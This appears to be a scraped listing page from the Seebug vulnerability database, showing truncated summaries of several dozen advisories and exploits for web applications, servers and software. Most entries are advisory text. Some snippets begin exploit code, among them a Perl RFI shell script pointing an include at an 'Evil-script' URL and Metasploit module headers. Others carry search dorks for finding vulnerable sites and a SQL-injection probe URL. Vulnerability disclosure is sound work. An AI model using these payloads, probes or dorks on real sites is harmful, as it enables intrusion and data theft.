Seebug: Most viewed

56796 matches found

seebug.org
added 2017/06/19 12:0 a.m., 109 views

finecmsV5.0.8 \finecms\dayrui\controllers\Api.php getshell

The vulnerability is in the data2 function of C:\phpStudy\WWW\finecms\dayrui\controllers\Api.php, at approximately line 115; the problematic code is at about line 178: public function data2 $data = array; // Route authentication if defined'SYSREFERER' && strlenSYSREFERER $http = $SERVER'HTTPREFERER' ?...

7.3 AI score
Exploits: 0

seebug.org
added 2016/06/03 12:0 a.m., 109 views

Digital Campus 2.0 digital campus platform /Page/ShowInfo.aspx ModuleID parameter SQL injection vulnerability

No description provided by source...

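7.1 AI score
Exploits: 0

seebug.org
added 2015/03/12 12:0 a.m., 109 views

A SQL injection vulnerability in PHPEMS

Brief description: A SQL injection vulnerability in PHPEMS. Details: 6. phpems has a SQL injection vulnerability. The vulnerable code is in the exercise function of /app/exam/app.php, towards the end, at around line 928: $questionids = $this-question-selectQuestionsByKnows$args'knowsid',$args'number',$dt;//SQL injection vulnerability. The parameter here is $args'knowsid'; tracing back to line 898, $args = $this-ev-get'args'; can be controlled from the URL. It then enters the function public function...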

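7 AI score
Exploits: 0

seebug.org
added 2013/01/09 12:0 a.m., 109 views

Adobe ColdFusion authentication bypass vulnerability (CVE-2013-0625)

CVE ID: CVE-2013-0625 Adobe ColdFusion is an efficient web application server development environment. Adobe ColdFusion on Windows, Macintosh and UNIX has a security vulnerability that allows unauthorized users to remotely bypass authentication controls and take control of affected servers. This vulnerability only affects ColdFusion customers who have not enabled password protection or have not set a password. 0 Adobe ColdFusion 10 Adobe ColdFusion 9.0.2 Adobe ColdFusion 9.0.1 Adobe ColdFusion 9.0 Vendor solution...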

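6.8 CVSS, 0.5 AI score, 0.93797 EPSS
Exploits: 5

seebug.org
added 2009/06/22 12:0 a.m., 109 views

OpenSSL dtls1_retrieve_buffered_fragment() function handshake message denial-of-service vulnerability

BUGTRAQ ID: 35417 CVE(CAN) ID: CVE-2009-1387 OpenSSL is an open-source SSL implementation used to provide strong encryption for network communication, and is now widely used in a variety of network applications. When OpenSSL receives a handshake message with an unexpected sequence number, it passes it to the dtls1_process_out_of_seq_message function. If the sequence number is lower than expected, the function discards the data; if it belongs to a later message, the function buffers the data. When data is discarded, the message fragment length stays 0, indicating that no data was buffered. Because of an incorrect if condition used to check the length, a fragment with no data but with the length of the discarded message is sometimes buffered, which later causes a bus error when it is processed. OpenSSL 0.9.x...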

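5 CVSS, 0.10254 EPSS
Exploits: 1

seebug.org
added 2009/04/10 12:0 a.m., 109 views

Apache Tomcat mod_jk Content-Length header information disclosure vulnerability

BUGTRAQ ID: 34412 CVE(CAN) ID: CVE-2008-5519 Apache Tomcat is a popular open-source JSP application server. If a malicious client submits a malicious request with an empty Content-Length header to the mod_jk module of an Apache Tomcat server, or repeatedly submits the same request within a short time, it can view responses associated with other users' requests. Apache Group mod_jk 1.2.0 - 1.2.26 Apache Group ------------ The vendor has released an upgrade patch to fix this security issue; download it from the vendor's home page: http://httpd.apache.org/...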

2.6 CVSS, 6.3 AI score, 0.07263 EPSS
Exploits: 2

seebug.org
added 2007/03/24 12:0 a.m., 109 views

PHPRaid RSS.PHP remote file inclusion vulnerability

!/usr/bin/perl phpraid cmd shell example: Exploit : http://www.example.com/phpRaidpath/rss.php?phpraiddir=Evil-script? use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1; $cmdv = $ARGV2; if$Path!/http:/// || $Pathtocmd!/http:/// || !$cmdvusage head; while print "shell $"; while $cmd=$;...

7.5 AI score
Exploits: 0

seebug.org
added 2007/03/08 12:0 a.m., 109 views

PHP-Nuke Module PostGuestbook 0.6.1 (tpl_pgb_moddir) RFI Vulnerability

No description provided by source. PostGuestbook 0.6.1tplpgbmoddirRemote File Include Expliot D.Script: http://sourceforge.net/projects/postguestbook/ Dork: "Powered by: PostGuestbook 0.6.1" Discovered by GloDM = Mahmoodali Homepage: http://www.Tryag.cc Greetz To Tryag-Team & 4lKaSrGoLd3n-Team &...

7.1 AI score
Exploits: 0

seebug.org
added 2021/07/08 12:0 a.m., 108 views

IBM QRadar SIEM server-side request forgery SSRF (CVE-2020-4786)

...

4 CVSS, 2.3 AI score, 0.00541 EPSS
Exploits: 1

seebug.org
added 2018/06/22 12:0 a.m., 108 views

OurPHP 1.8 admin backend arbitrary file read vulnerability

...

0.8 AI score
Exploits: 0

seebug.org
added 2017/09/15 12:0 a.m., 108 views

Foscam IP Video Camera CGIProxy.fcgi SMTP Test Host Parameter Configuration Command Injection Vulnerability(CVE-2017-2841)

Summary An exploitable command injection vulnerability exists in the web management interface used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.37. A specially crafted HTTP request can allow for a user to inject arbitrary data in the "msmtprc" configuration file resulting...

6.5 CVSS, 9.6 AI score, 0.06052 EPSS
Exploits: 1

seebug.org
added 2016/09/09 12:0 a.m., 108 views

Adobe ColdFusion < 11 Update 10 - XML external entity injection

Discovered by: Dawid Golunski - http://legalhackers.com - dawid at legalhackers.com - APSB16-30 - Release date: 31.08.2016 I. VULNERABILITY Adobe ColdFusion = 11 XML External Entity XXE Injection II. BACKGROUND "Adobe ColdFusion 11 Enterprise Edition offers a single platform to rapidly build and...

6.4 CVSS, 9.3 AI score, 0.69044 EPSS
Exploits: 7

seebug.org
added 2016/08/08 12:0 a.m., 108 views

Internet Explorer 11 VBScript engine memory corruption vulnerability

No description provided by source. This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "Internet Explorer 11 VBScript Engine Memory Corruption", 'Description' = %q This module...

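7.6 CVSS, 7.8 AI score, 0.93165 EPSS
Exploits: 10

seebug.org
added 2016/02/26 12:0 a.m., 108 views

Weaver (泛微) OA: an interface allows executing arbitrary SQL statements without login (script attached)

Brief description: Out of practice, can't do anything, looking for a job. Details: Taking a local instance as the example first: http://localhost:8088/ws http://localhost:8088/ws/query?wsdl It surprisingly returns Unmarshalling Error: unexpected element uri:"http://.../", local:"arg0". Expected elements are arg1,arg0 Searching shows this is a parameter problem. Changing the code is certainly not an option, so change the parameters instead. ORA-00900: 无效 sql 语句 It looks like this works. Change the first parameter select...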

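7.2 AI score
Exploits: 0

seebug.org
added 2014/07/21 12:0 a.m., 108 views

YXcms: forged cookie bypasses authentication to log in as any user

Brief description: The source code contains encryption and decryption functions for cookies, so cookies can be forged; since the program uses cookies for permission checks, it is possible to log in as any user. Details: Protected/apps/members/controller/indexController.php public function login if!$this-isPost//when POST is not used $cookieauth=getcookie'auth';//here the authentication information is read directly from the cookie; we follow the getcookie function to see whether a cookie can be forged to bypass authentication if!empty$this-auth...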

7 AI score
Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 108 views

Veritas NetBackup - Remote Command Execution

No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...

7.1 AI score
Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 108 views

Postfix <= 2.6-20080814 - (symlink) Local Privilege Escalation Exploit

No description provided by source. !/bin/sh rspocfix.sh PoC for Postfix local root vulnerability: CVE-2008-2936 by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt [email protected] Tested: Ubuntu / Debian Madrid, 30.Aug.2008 Config writabledir=/tmp spooldir=/var/mail Use postconf mailspooldirectory...

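6.2 CVSS, 6.3 AI score, 0.01001 EPSS
Exploits: 6

seebug.org
added 2014/02/27 12:0 a.m., 108 views

Apache Tomcat XML external entity information disclosure vulnerability

Bugtraq ID: 65768 CVE ID: CVE-2013-4590 Apache Tomcat is an open-source JSP application server. Apache Tomcat provides XML files such as web.xml, context.xml, .tld, .tagx and .jspx, which allows attackers to exploit the vulnerability to carry out XXE attacks and obtain internal information from the Tomcat application. Tomcat is affected by this vulnerability when it runs on untrusted sources, such as a shared hosting environment. 0 Apache Tomcat 8.0.0-RC1 Apache Tomcat 7.0.0 - 7.0.42 Apache Tomcat 6.0.0 - 6.0.37 Vendor patch: Apache...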

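4.3 CVSS, 8.3 AI score, 0.09487 EPSS
Exploits: 1

seebug.org
added 2013/12/16 12:0 a.m., 108 views

TYPO3 Backend User Administration reflected cross-site scripting vulnerability

TYPO3 is a content management system based on PHP4/PHP5 and MySQL. TYPO3's Backend User Administration has a reflected cross-site scripting vulnerability that allows remote attackers to build a malicious URI and lure a user into opening it; when the malicious data is viewed, sensitive information can be obtained or the user's session hijacked. 0 TYPO3 6.0.0 TYPO3 6.0.11 TYPO3 6.1.0 TYPO3 6.1.6 TYPO3 6.2 Vendor patch: TYPO3 ----- TYPO3 4.5.32, 4.7.17, 6.0.12, 6.1.7 have fixed this vulnerability; download them from the vendor's home page: http://typo3.org/...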

7.1 AI score
Exploits: 0

seebug.org
added 2013/11/13 12:0 a.m., 108 views

discuz! x3.0 /static/image/common/focus.swf cross-site scripting vulnerability

No description provided by source...

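7.1 AI score
Exploits: 0

seebug.org
added 2013/02/03 12:0 a.m., 108 views

JBoss Enterprise Application Platform multiple security bypass vulnerabilities (CVE-2012-0874)

Bugtraq ID: 57552 CVE ID: CVE-2012-0874 JBOSS is an open-source application server based on J2EE. In certain configurations, unauthenticated access to the JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets is allowed. A second layer of authentication in the security interceptor prevents direct exploitation of this vulnerability, but if the interceptor is misconfigured or improperly disabled, arbitrary code execution can result. 0 Red Hat JBoss Enterprise Web Platform for RHEL 5 Server 5 Red Hat JBoss Enterprise Web Platform for RHEL 4...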

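6.8 CVSS, 6.1 AI score, 0.15561 EPSS
Exploits: 1

seebug.org
added 2013/02/03 12:0 a.m., 108 views

Squid 'cachemgr.cgi' incomplete fix remote denial-of-service vulnerability

Bugtraq ID: 57646 CVE ID: CVE-2013-0189 Squid is a powerful proxy server and web cache server. Squid's tools/cachemgr.cc has multiple memory leak issues that allow remote attackers to trigger the vulnerability by submitting an invalid Content-Length header, an overly long POST request, or specially crafted authentication credentials, crashing the application. The issue results from an incomplete fix for CVE-2012-5643. 0 Squid 2.x Squid 3.x Squid 3.2.x Squid 3.3.x Vendor solution: users can refer to the following vendor security advisory for patch information:...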

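5 CVSS, 8.1 AI score, 0.23026 EPSS
Exploits: 1

seebug.org
added 2009/03/03 12:0 a.m., 108 views

Linux Kernel audit system audit_syscall_entry() system call security restriction bypass vulnerability

BUGTRAQ ID: 33951 The Linux Kernel is the kernel used by the open-source operating system Linux. Syscall filtering techniques usually decide whether to allow a call based on the syscall identified by its number or on specific arguments. When a syscall is identified by number, on a 64-bit Linux kernel (x86_64) a syscall number may map into both the 32-bit and the 64-bit syscall tables, and these two tables differ. Because user-space processes are controlled by the syscall table, the syscall number check can be bypassed and unauthorized operations performed. For example, a syscall filter may be monitoring a 64-bit process and be configured to allow a subset of the common open syscall, which on a 64-bit platform is syscal...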

6.8 AI score
Exploits: 0

seebug.org
added 2008/10/30 12:0 a.m., 108 views

Mambo Component SimpleBoard <= 1.0.1 Arbitrary File Upload Exploit

No description provided by source. !/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; my $fname = rand99999 . ".php"; no int print INTRO; - SimpleBoard Mambo Component = 1.0.1 - - Remote Arbitrary File Upload Exploit - Discovered && Coded by: t0pP8uZz Discover...

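7.1 AI score
Exploits: 0

seebug.org
added 2008/09/24 12:0 a.m., 108 views

jPortal 'humor.php' SQL injection vulnerability

BUGTRAQ ID: 31274 CNCAN ID: CNCAN-2008092309 jPortal is a PHP-based web application. jPortal does not properly handle user-submitted input; remote attackers can exploit the vulnerability to carry out SQL injection attacks, possibly obtaining sensitive information or manipulating the database. The problem is that the 'humor.php' script does not filter the user-supplied 'id' parameter; building a malicious SQL query as the parameter data can alter the original SQL logic, obtaining sensitive information or manipulating the database. JPortal 2 No solution is currently available: http://www.jportal.info/downloadjportal.php...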

6.9 AI score
Exploits: 0

seebug.org
added 2008/02/20 12:0 a.m., 108 views

NERO Media Player <= 1.4.0.35b M3U File Buffer Overflow PoC

No description provided by source. NERO Media Player = 1.4.0.35b Remote Buffer Overflow .M3U This exception may be expected and handled. eax=03e90f40 ebx=41414141 ecx=009d01c8 edx=009d015c esi=03e90f38 edi=41414141 eip=7c92b3fb esp=0010bff8 ebp=0010c214 iopl=0 nv up ei pl nz ac pe nc cs=001b...

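7.1 AI score
Exploits: 0

seebug.org
added 2007/10/31 12:0 a.m., 108 views

TikiWiki Tiki-Graph_Formula.PHP whitelist check code injection vulnerability

TikiWiki is a content management system/portal system/groupware system built on PHP, ADOdb and Smarty. TikiWiki's tiki-graph_formula.php does not properly filter user-submitted parameters; remote attackers can exploit the vulnerability to inject malicious PHP code and execute it with web privileges. TikiWiki's tiki-graph_formula.php script uses PHP's create_function to create an anonymous function that dynamically evaluates a mathematical function supplied by the user through the 'f' URL parameter. To protect against execution of arbitrary PHP code, the TikiWiki developers combined a blacklist and a whitelist. On one hand they blacklist three characters; on the other, only certain numeric strings are allowed in user-supplied input...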

7.5 CVSS, 0.1 AI score, 0.76661 EPSS
Exploits: 6

seebug.org
added 2018/06/14 12:0 a.m., 107 views

ecshop 2.7.3 code execution vulnerability

...

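0.9 AI score
Exploits: 0

seebug.org
added 2018/05/10 12:0 a.m., 107 views

KONGTOP DVR backdoor analysis (CVE-2018-10734)

Preface: The KONGTOP (康拓) DVR contains a Telnet backdoor, which creates the risk of the surveillance device being taken over and even the internal network being penetrated. The backdoor is analyzed below; there is nothing technically sophisticated about it. Vulnerability analysis: The backdoor is in the Telnetd file. Telnetd is responsible for starting telnet and providing the service. Here we can see that once the Telnet service is started it listens for user connections; if a logged-in user is idle for a long time the login times out, and then there is a series of service preparation and handling functions. After we enable the Telnetd service, that is, after telnet is turned on, the program checks whether the launching program is running in a terminal; if so it proceeds to the next step, otherwise it exits and prints UNKNOW. After passing the local environment check, the program starts extracting the user's login data and stores it in memory...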

5 CVSS, 9.7 AI score, 0.01869 EPSS
Exploits: 2

seebug.org
added 2016/11/17 12:0 a.m., 107 views

Apache Shiro remote security restriction bypass vulnerability (CVE-2016-6802)

Apache Shiro before 1.3.2 allows attackers to bypass intended servlet filters and gain access by leveraging the use of a non-root servlet context path. shiro in the path control, the attacker can bypass the filter to access filtered path, the impact of the version shrio 1.3.2 From the above figur...

5 CVSS, 7.6 AI score, 0.0968 EPSS
Exploits: 1

seebug.org
added 2016/01/18 12:0 a.m., 107 views

Maxcms /inc/ajax.asp id parameter SQL injection vulnerability

No description provided by source...

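7.1 AI score
Exploits: 0

seebug.org
added 2015/12/01 12:0 a.m., 107 views

HumHub 0.11.2 and 0.20.0-beta.2 - SQL injection vulnerability

General steps for finding SQL injection: 1. Find data inputs (forms) 2. Inject data 3. Detect abnormal responses, such as HTTP 500 errors or SQL errors. This process can be automated with a variety of tools. AWVS detected that /index.php may have a SQL injection. The following address returns a SQL error; the from field is the injection point: http://localhost/index.php?from=1'"&limit=10&mode=activity&r=space/space/stream&sguid=e9659cfc-886f-4524-94ae-1721999ad43b...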

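7.3 AI score
Exploits: 0

seebug.org
added 2015/09/21 12:0 a.m., 107 views

yxcms 1.2.9 arbitrary file deletion vulnerability

yxcms version 1.2.9 has an arbitrary file deletion vulnerability. Vulnerable file: /protected/apps/member/controller/photocontroller.php. When an album is added, the image list is taken directly and stored in the database; when an album is deleted, the paths of the images to delete are not filtered at all, and if a file path exists, the list of uploaded files is iterated over and deleted. The class initialization contains $this-uploadpath=ROOTPATH.'upload/photos/';, so at upload time the upload path can be set to ../../protected/apps/install/install.lock; on deletion the file is found to exist and is therefore deleted. Deleting install.lock can...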

7.1 AI score
Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 107 views

Subdreamer 3.0.1 - CMS upload Vulnerability

No description provided by source. ======================================================================================== | Title : Subdreamer.v3.0.1 cms upload Vulnerability | Author : indoushka | email : [email protected] | Home : www.h4kz.com | Web Site : | Dork : Website powered by...

7.1 AI score
Exploits: 0

seebug.org
added 2014/07/01 12:0 a.m., 107 views

Mac OS X Sudo Password Bypass

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'shellwords' class Metasploit3...

6.9 CVSS, 0.1 AI score, 0.03202 EPSS
Exploits: 8

seebug.org
added 2014/01/10 12:0 a.m., 107 views

Java %c0%ae security mode bypass vulnerability

No description provided by source...

7.1 AI score
Exploits: 0

seebug.org
added 2013/10/11 12:0 a.m., 107 views

appcms 1.3.708 /pic.php arbitrary file download vulnerability

No description provided by source...

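7.1 AI score
Exploits: 0

seebug.org
added 2013/06/11 12:0 a.m., 107 views

Apache Struts OGNL expression injection vulnerability (CVE-2013-2134)

BUGTRAQ ID: 60346 CVE(CAN) ID: CVE-2013-2134 Struts2 is a second-generation Java enterprise web application framework based on the Model-View-Controller (MVC) model. It is the product of the merger of the WebWork and Struts communities. Apache Struts 2.0.0-2.3.14.3 has a remote OGNL expression injection vulnerability that remote attackers can exploit to manipulate server-side objects and execute arbitrary commands in the context of the affected application. The vulnerability stems from a wildcard matching error. 0 Apache Group Struts 2.x Vendor patch: Apache Group ------------ Apache...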

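9.3 CVSS, 1.2 AI score, 0.70211 EPSS
Exploits: 1

seebug.org
added 2012/07/06 12:0 a.m., 107 views

Tiki Wiki CMS Groupware 'unserialize()' PHP code execution vulnerability

Bugtraq ID: 54298 CVE ID: CVE-2012-0911 Tiki Wiki CMS Groupware is a content management and collaboration system. Multiple scripts in Tiki Wiki CMS Groupware call "unserialize" on user-controllable input, which can lead to execution of arbitrary PHP code by passing ad-hoc Zend Framework serialized objects. 0 Tiki Wiki CMS Groupware = 8.3 Vendor patch: Tiki Wiki ----- Tiki Wiki CMS Groupware 8.4 has fixed this vulnerability; users are advised to download and use it:...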

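7.5 CVSS, 0.1 AI score, 0.62989 EPSS
Exploits: 12

seebug.org
added 2009/02/26 12:0 a.m., 107 views

Adobe Flash Player invalid object reference remote code execution vulnerability

BUGTRAQ ID: 33880 CVE(CAN) ID: CVE-2009-0520 Flash Player is a very popular Flash player. When processing Shockwave Flash files, Flash Player attempts to create a particular object and multiple references to it, and later frees the object and removes the associated references, but a reference may mistakenly still point to the object. The invalid object resides in uninitialized memory, and an attacker can control that memory region to gain control of execution. Adobe Flash Player 10.x Vendor patch: Adobe ----- The vendor has released an upgrade patch to fix this security issue; download it from the vendor's home page:...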

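9.3 CVSS, 6.4 AI score, 0.28484 EPSS
Exploits: 1

seebug.org
added 2008/11/11 12:0 a.m., 107 views

VMware products Trap Flag handling local privilege escalation vulnerability

BUGTRAQ ID: 32168 CVE(CAN) ID: CVE-2008-4915 VMWare is virtual PC software that allows two or more Windows, DOS or Linux systems to run simultaneously on one machine. VMWare has a problem in how it handles instruction execution, which attackers may exploit to elevate their privileges. If an interrupt occurs while the Trap Flag is set, a correct CPU clears the Trap Flag before transferring execution to the interrupt handler. On affected VMware versions, if a kernel-mode IRET sets the Trap Flag, then when a single-byte INT 3 instruction is executed the Trap Flag persists after the mode switch. The result is that if the kernel can be caused, through IRET, to set the Trap...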

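6.9 CVSS, 6.5 AI score, 0.00408 EPSS
Exploits: 1

seebug.org
added 2008/07/03 12:0 a.m., 107 views

EfesTECH Shop "cat_id" SQL injection vulnerability

BUGTRAQ ID: CNCAN ID: CNCAN-2008070303 EfesTECH Shop is an ASP-based web application. EfesTECH Shop does not properly handle user-submitted input; remote attackers can exploit the vulnerability to carry out SQL injection attacks, possibly obtaining sensitive information or manipulating the database. The problem is that the 'default.asp' script does not filter the user-supplied 'cat_id' parameter; building a malicious SQL query as the parameter data can alter the original SQL logic, obtaining sensitive information or manipulating the database. EfesTECH Shop 2.x No detailed solution is currently available: http://www.aspindir.com/Goster/5479...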

6.9 AI score
Exploits: 0

seebug.org
added 2008/05/05 12:0 a.m., 107 views

BlogMe PHP (comments.php id) SQL Injection Vulnerability

No description provided by source. + BlogMe PHP remote SQL injection exploit + Script download : http://www.drumster.net/gamma/downloads/BlogMe11.zip + Founded by : His0k4 ALGERIAN HaCkEr + Greetz : All friends & muslims HaCkeRs... + Dork : "BlogMe PHP created by Gamma Scripts" + Exploit :...

7.1 AI score
Exploits: 0

seebug.org
added 2007/03/26 12:0 a.m., 107 views

PHP 5.2.0 header() Space Trimming Buffer Underflow Exploit (MacOSX)

No description provided by source. ?php //////////////////////////////////////////////////////////////////////// // // // | || | | | | | | | || || // // | |/ || '|/ |/ -| ' / -/ |||| /| || / //...

7.1 AI score
Exploits: 0

seebug.org
added 2006/11/07 12:0 a.m., 107 views

PHPGiggle 12.08 (CFG_PHPGIGGLE_ROOT) File Include Vulnerability

No description provided by source. Title : Php Giggle = 12.08 Remote File Include Vulnerability Author : ajann Vuln; File startup.php /File Code,1 startup.php Error: .. .... include$CFGPHPGIGGLEROOT . $CFGMODULEROOT . "/kernel/system/modregistry.inc.php"; include$CFGPHPGIGGLEROOT . $CFGMODULEROOT...

7.1 AI score
Exploits: 0

seebug.org
added 2021/03/31 12:0 a.m., 106 views

VMware vRealize Operations Manager SSRF and file read vulnerabilities (CVE-2021-21975 CVE-2021-21983)

Description On March 30, 2021, VMware published a security advisory for CVE-2021-21975 and CVE-2021-21983, two chainable vulnerabilities in its vRealize Operations Manager product. CVE-2021-21975 is an unauthenticated server-side request forgery SSRF, while CVE-2021-21983 is an authenticated...

8.5 CVSS, 8.1 AI score, 0.7829 EPSS
Exploits: 12

seebug.org
added 2017/11/08 12:0 a.m., 106 views

Cesanta Mongoose Websocket Protocol Fragmented Packet Code Execution Vulnerability(CVE-2017-2922)

Summary An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause a buffer to be allocated while leaving stale pointers which leads to a use-after-free vulnerability which can be exploited...

9.9 AI score, 0.02625 EPSS
Exploits: 2

seebug.org
added 2017/06/14 12:0 a.m., 106 views

One of my first sandbox escapes and bugs (CVE-2015-1743)

Advisory link: http://www.zerodayinitiative.com/advisories/ZDI-15-377/ CVE-2015-1743 Demo: https://www.youtube.com/watch?v=6Vtl8kh6keQ Below is one of my first sandbox escapes, and my entry into vulnerability research. My first bugs relied heavily on the work that Forshaw did my later ones deviat...

7.5 CVSS, 6.7 AI score, 0.13736 EPSS
Exploits: 1

seebug.org
added 2016/12/30 12:0 a.m., 106 views

SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)

DESCRIPTION ------------------------- SwiftMailer class uses PHP mail function as its default transport. SwiftMailer suffers from the same vulnerability as the one disclosed in PHPMailer in the advisory at:...

7.5 CVSS, 10.3 AI score, 0.99714 EPSS
Exploits: 66

seebug.org
added 2016/03/18 12:0 a.m., 106 views

phpMyWind v5.3 /goodsshow.php code execution

No description provided by source...

7.1 AI score
Exploits: 0

Total number of security vulnerabilities: 5000